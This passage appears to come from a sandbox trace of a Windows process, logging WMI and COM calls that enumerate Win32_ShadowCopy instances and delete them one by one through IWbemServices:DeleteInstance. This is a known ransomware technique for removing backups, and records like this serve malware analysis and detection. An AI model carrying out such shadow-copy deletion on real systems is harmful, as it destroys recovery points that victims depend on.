(This=0x1be536d0) returned 0x2 [0145.826] WbemDefPath:IUnknown:Release (This=0x1be5a610) returned 0x0 [0145.826] WbemDefPath:IUnknown:Release (This=0x1be536d0) returned 0x1 [0145.826] CoGetContextToken (in: pToken=0x1c90d920 | out: pToken=0x1c90d920) returned 0x0 [0145.826] CoGetContextToken (in: pToken=0x1c90d860 | out: pToken=0x1c90d860) returned 0x0 [0145.826] WbemDefPath:IUnknown:AddRef (This=0x1be536d0) returned 0x2 [0145.826] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be536d0, riid=0x1c90d9a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90d980 | out: ppvObject=0x1c90d980*=0x1be536d0) returned 0x0 [0145.826] WbemDefPath:IUnknown:Release (This=0x1be536d0) returned 0x2 [0145.826] WbemDefPath:IUnknown:Release (This=0x1be536d0) returned 0x1 [0145.827] CoGetContextToken (in: pToken=0x1c90daa0 | out: pToken=0x1c90daa0) returned 0x0 [0145.827] CoGetContextToken (in: pToken=0x1c90d9e0 | out: pToken=0x1c90d9e0) returned 0x0 [0145.827] WbemDefPath:IUnknown:AddRef (This=0x1be536d0) returned 0x2 [0145.827] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be536d0, riid=0x1c90db20*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90db00 | out: ppvObject=0x1c90db00*=0x1be536d0) returned 0x0 [0145.827] WbemDefPath:IUnknown:Release (This=0x1be536d0) returned 0x2 [0145.827] WbemDefPath:IUnknown:AddRef (This=0x1be536d0) returned 0x3 [0145.827] WbemDefPath:IWbemPath:SetText (This=0x1be536d0, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}\"") returned 0x0 [0145.827] WbemDefPath:IUnknown:Release (This=0x1be536d0) returned 0x2 [0145.828] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90dd60 | out: puCount=0x1c90dd60*=0x2) returned 0x0 [0145.828] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c90dd60*=0x17, pszText=0x0) returned 0x0 [0145.828] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90dd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0145.829] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0145.829] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0145.829] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0145.829] IWbemClassObject:Get (in: This=0x1be609e0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0145.829] SysStringLen (param_1="root\\cimv2") returned 0xa [0145.829] IWbemClassObject:Get (in: This=0x1be609e0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0145.829] SysStringLen (param_1="root\\cimv2") returned 0xa [0145.829] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0145.829] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0145.829] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0145.830] IWbemClassObject:Get (in: This=0x1be609e0, wszName="__CLASS", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0145.830] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0145.830] IWbemClassObject:Get (in: This=0x1be609e0, wszName="__CLASS", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0145.830] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0145.885] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be536d0, puCount=0x1c90d500 | out: puCount=0x1c90d500*=0x2) returned 0x0 [0145.885] WbemDefPath:IWbemPath:GetText (in: This=0x1be536d0, lFlags=4, puBuffLength=0x1c90d500*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d500*=0x54, pszText=0x0) returned 0x0 [0145.885] WbemDefPath:IWbemPath:GetText (in: This=0x1be536d0, lFlags=4, puBuffLength=0x1c90d500*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d500*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}\"") returned 0x0 [0145.885] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d450 | out: puCount=0x1c90d450*=0x2) returned 0x0 [0145.885] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d450*=0x17, pszText=0x0) returned 0x0 [0145.885] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d450*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0145.885] CoGetContextToken (in: pToken=0x1c90d2e0 | out: pToken=0x1c90d2e0) returned 0x0 [0145.885] WbemLocator:IUnknown:AddRef (This=0x1b92e6f0) returned 0x3 [0145.885] WbemLocator:IUnknown:QueryInterface (in: This=0x1b92e6f0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90ceb0 | out: ppvObject=0x1c90ceb0*=0x1b92e6f0) returned 0x0 [0145.886] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x3 [0145.886] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x2 [0145.886] IWbemClassObject:Get (in: This=0x1be609e0, wszName="__GENUS", lFlags=0, pVal=0x1c90d440*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d43c*=0, plFlavor=0x1c90d438*=0 | out: pVal=0x1c90d440*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90d43c*=3, plFlavor=0x1c90d438*=64) returned 0x0 [0145.886] WbemDefPath:IWbemPath:GetText (in: This=0x1be536d0, lFlags=2, puBuffLength=0x1c90d510*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d510*=0x3d, pszText=0x0) returned 0x0 [0145.886] WbemDefPath:IWbemPath:GetText (in: This=0x1be536d0, lFlags=2, puBuffLength=0x1c90d510*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d510*=0x3d, pszText="Win32_ShadowCopy.ID=\"{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}\"") returned 0x0 [0145.887] IWbemServices:DeleteInstance (in: This=0x1be444f8, strObjectPath="Win32_ShadowCopy.ID=\"{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0146.903] CoTaskMemAlloc (cb=0x8) returned 0x16a900 [0146.903] IEnumWbemClassObject:Next (in: This=0x1be44788, lTimeout=-1, uCount=0x1, apObjects=0x16a900, puReturned=0x1c90de18 | out: apObjects=0x16a900*=0x1be5ff20, puReturned=0x1c90de18*=0x1) returned 0x0 [0146.905] IUnknown:QueryInterface (in: This=0x1be5ff20, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d140 | out: ppvObject=0x1c90d140*=0x1be5ff20) returned 0x0 [0146.905] IUnknown:QueryInterface (in: This=0x1be5ff20, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90d1c0 | out: ppvObject=0x1c90d1c0*=0x0) returned 0x80004002 [0146.905] IUnknown:QueryInterface (in: This=0x1be5ff20, riid=0x7fef2d6d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90cf58 | out: ppvObject=0x1c90cf58*=0x0) returned 0x80004002 [0146.906] IUnknown:AddRef (This=0x1be5ff20) returned 0x3 [0146.906] CoGetContextToken (in: pToken=0x1c90ce10 | out: pToken=0x1c90ce10) returned 0x0 [0146.906] IUnknown:QueryInterface (in: This=0x1be5ff20, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cdd0 | out: ppvObject=0x1c90cdd0*=0x1be5ff28) returned 0x0 [0146.906] IMarshal:GetUnmarshalClass (in: This=0x1be5ff28, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90ce00 | out: pCid=0x1c90ce00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0146.906] IUnknown:Release (This=0x1be5ff28) returned 0x3 [0146.906] CoGetContextToken (in: pToken=0x1c90cde0 | out: pToken=0x1c90cde0) returned 0x0 [0146.906] IUnknown:AddRef (This=0x1be5ff20) returned 0x4 [0146.906] IUnknown:QueryInterface (in: This=0x1be5ff20, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cef8 | out: ppvObject=0x1c90cef8*=0x0) returned 0x80004002 [0146.906] IUnknown:Release (This=0x1be5ff20) returned 0x3 [0146.907] IUnknown:Release (This=0x1be5ff20) returned 0x2 [0146.907] CoGetContextToken (in: pToken=0x1c90d2a0 | out: pToken=0x1c90d2a0) returned 0x0 [0146.907] CoGetContextToken (in: pToken=0x1c90d1e0 | out: pToken=0x1c90d1e0) returned 0x0 [0146.907] IUnknown:AddRef (This=0x1be5ff20) returned 0x3 [0146.907] IUnknown:QueryInterface (in: This=0x1be5ff20, riid=0x1c90d320*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c90d300 | out: ppvObject=0x1c90d300*=0x1be5ff20) returned 0x0 [0146.907] IUnknown:Release (This=0x1be5ff20) returned 0x3 [0146.907] IUnknown:Release (This=0x1be5ff20) returned 0x2 [0146.907] IUnknown:Release (This=0x1be5ff20) returned 0x1 [0146.907] CoTaskMemFree (pv=0x16a900) [0146.907] CoGetContextToken (in: pToken=0x1c90dc20 | out: pToken=0x1c90dc20) returned 0x0 [0146.907] IUnknown:AddRef (This=0x1be5ff20) returned 0x2 [0146.908] IWbemClassObject:Get (in: This=0x1be5ff20, wszName="__GENUS", lFlags=0, pVal=0x1c90dd90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd8c*=0, plFlavor=0x1c90dd88*=0 | out: pVal=0x1c90dd90*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90dd8c*=3, plFlavor=0x1c90dd88*=64) returned 0x0 [0146.908] IWbemClassObject:Get (in: This=0x1be5ff20, wszName="__PATH", lFlags=0, pVal=0x1c90dd30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd2c*=0, plFlavor=0x1c90dd28*=0 | out: pVal=0x1c90dd30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}\"", varVal2=0x0), pType=0x1c90dd2c*=8, plFlavor=0x1c90dd28*=64) returned 0x0 [0146.908] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}\"") returned 0x53 [0146.908] CoGetObjectContext (in: riid=0x1c90dcc8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90dcc0 | out: ppv=0x1c90dcc0*=0x142498) returned 0x0 [0146.908] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90dce0 | out: pAptType=0x1c90dce0*=1) returned 0x0 [0146.908] IUnknown:QueryInterface (in: This=0x142498, riid=0x2fcaaf0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90dde8 | out: ppvObject=0x1c90dde8*=0x0) returned 0x80004002 [0146.908] IUnknown:Release (This=0x142498) returned 0x1 [0146.912] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d350 | out: ppv=0x1c90d350*=0x1be41ce0) returned 0x0 [0146.912] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be41ce0, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90d060 | out: ppvObject=0x1c90d060*=0x0) returned 0x80004002 [0146.912] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be41ce0, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d048 | out: ppvObject=0x1c90d048*=0x1be53790) returned 0x0 [0146.912] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53790, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cf50 | out: ppvObject=0x1c90cf50*=0x1be53790) returned 0x0 [0146.913] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53790, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90cfd0 | out: ppvObject=0x1c90cfd0*=0x0) returned 0x80004002 [0146.913] WbemDefPath:IUnknown:AddRef (This=0x1be53790) returned 0x3 [0146.913] CoGetContextToken (in: pToken=0x1c90cc20 | out: pToken=0x1c90cc20) returned 0x0 [0146.913] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53790, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cbe0 | out: ppvObject=0x1c90cbe0*=0x1b929d60) returned 0x0 [0146.913] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b929d60, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90cc10 | out: pCid=0x1c90cc10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0146.914] WbemDefPath:IUnknown:Release (This=0x1b929d60) returned 0x3 [0146.914] CoGetContextToken (in: pToken=0x1c90cbf0 | out: pToken=0x1c90cbf0) returned 0x0 [0146.914] WbemDefPath:IUnknown:AddRef (This=0x1be53790) returned 0x4 [0146.914] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53790, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cd08 | out: ppvObject=0x1c90cd08*=0x0) returned 0x80004002 [0146.914] WbemDefPath:IUnknown:Release (This=0x1be53790) returned 0x3 [0146.914] WbemDefPath:IUnknown:Release (This=0x1be53790) returned 0x2 [0146.914] WbemDefPath:IUnknown:Release (This=0x1be41ce0) returned 0x0 [0146.914] WbemDefPath:IUnknown:Release (This=0x1be53790) returned 0x1 [0146.915] CoGetContextToken (in: pToken=0x1c90d920 | out: pToken=0x1c90d920) returned 0x0 [0146.915] CoGetContextToken (in: pToken=0x1c90d860 | out: pToken=0x1c90d860) returned 0x0 [0146.915] WbemDefPath:IUnknown:AddRef (This=0x1be53790) returned 0x2 [0146.915] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53790, riid=0x1c90d9a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90d980 | out: ppvObject=0x1c90d980*=0x1be53790) returned 0x0 [0146.915] WbemDefPath:IUnknown:Release (This=0x1be53790) returned 0x2 [0146.915] WbemDefPath:IUnknown:Release (This=0x1be53790) returned 0x1 [0146.915] CoGetContextToken (in: pToken=0x1c90daa0 | out: pToken=0x1c90daa0) returned 0x0 [0146.915] CoGetContextToken (in: pToken=0x1c90d9e0 | out: pToken=0x1c90d9e0) returned 0x0 [0146.915] WbemDefPath:IUnknown:AddRef (This=0x1be53790) returned 0x2 [0146.915] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53790, riid=0x1c90db20*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90db00 | out: ppvObject=0x1c90db00*=0x1be53790) returned 0x0 [0146.916] WbemDefPath:IUnknown:Release (This=0x1be53790) returned 0x2 [0146.916] WbemDefPath:IUnknown:AddRef (This=0x1be53790) returned 0x3 [0146.916] WbemDefPath:IWbemPath:SetText (This=0x1be53790, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}\"") returned 0x0 [0146.916] WbemDefPath:IUnknown:Release (This=0x1be53790) returned 0x2 [0146.916] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90dd60 | out: puCount=0x1c90dd60*=0x2) returned 0x0 [0146.916] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c90dd60*=0x17, pszText=0x0) returned 0x0 [0146.916] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90dd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0146.922] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0146.922] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0146.922] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0146.922] IWbemClassObject:Get (in: This=0x1be5ff20, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0146.922] SysStringLen (param_1="root\\cimv2") returned 0xa [0146.922] IWbemClassObject:Get (in: This=0x1be5ff20, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0146.922] SysStringLen (param_1="root\\cimv2") returned 0xa [0146.923] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0146.923] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0146.923] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0146.923] IWbemClassObject:Get (in: This=0x1be5ff20, wszName="__CLASS", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0146.923] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0146.923] IWbemClassObject:Get (in: This=0x1be5ff20, wszName="__CLASS", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0146.923] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0146.927] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be53790, puCount=0x1c90d500 | out: puCount=0x1c90d500*=0x2) returned 0x0 [0146.928] WbemDefPath:IWbemPath:GetText (in: This=0x1be53790, lFlags=4, puBuffLength=0x1c90d500*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d500*=0x54, pszText=0x0) returned 0x0 [0146.928] WbemDefPath:IWbemPath:GetText (in: This=0x1be53790, lFlags=4, puBuffLength=0x1c90d500*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d500*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}\"") returned 0x0 [0146.928] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d450 | out: puCount=0x1c90d450*=0x2) returned 0x0 [0146.928] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d450*=0x17, pszText=0x0) returned 0x0 [0146.928] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d450*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0146.928] CoGetContextToken (in: pToken=0x1c90d2e0 | out: pToken=0x1c90d2e0) returned 0x0 [0146.928] WbemLocator:IUnknown:AddRef (This=0x1b92e6f0) returned 0x3 [0146.928] WbemLocator:IUnknown:QueryInterface (in: This=0x1b92e6f0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90ceb0 | out: ppvObject=0x1c90ceb0*=0x1b92e6f0) returned 